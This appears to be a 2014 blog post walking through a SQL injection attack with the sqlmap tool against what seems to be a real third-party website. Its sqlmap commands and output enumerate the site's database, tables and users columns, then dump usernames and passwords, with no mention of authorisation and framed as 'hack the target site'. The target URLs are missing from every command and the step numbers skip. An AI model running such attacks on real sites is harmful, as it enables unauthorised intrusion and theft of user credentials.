Thursday, 20 February 2014

SQL injection with SQLMAP Tool


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

first search the vulnerability into the target website.


now find the sql injection vulnerability into target website
ohh I found it....

this is the error on website
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

now start the Game ( hack the target site ) the sqlmap

root@kali:~# sqlmap --help

2.find out the database name of the target website

root@kali:~# sqlmap -u --dbs

output is
available databases [2]:
[*] information_schema
[*] tsbutton_db

3.access the tables of database

root@kali:~# sqlmap -u -D tsbutton_db --tables

output is
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database: tsbutton_db
[4 tables]
| news                 |         
| product            |
| product_type   |
| users               |
--------------------------------------------------------------------------------------------------------- it time to access the columns of tables which are we fetch from databse

root@kali:~# sqlmap -u -D tsbutton_db -T users --columns

output is
Database: tsbutton_db
Table: users
[5 columns]
| Column        | Type               |
| name           | varchar(25)    |
| Password   | varchar(255)  |
| type             | int(4)               |
| userid         | int(25)             |
| username | varchar(25)     |

5.access the user name

root@kali:~# sqlmap -u -D tsbutton_db -T users -C username --dump

we get the user name of the target website

6.Lets access the password

root@kali:~# sqlmap -u -D tsbutton_db -T users -C password --dump

 finally Game is over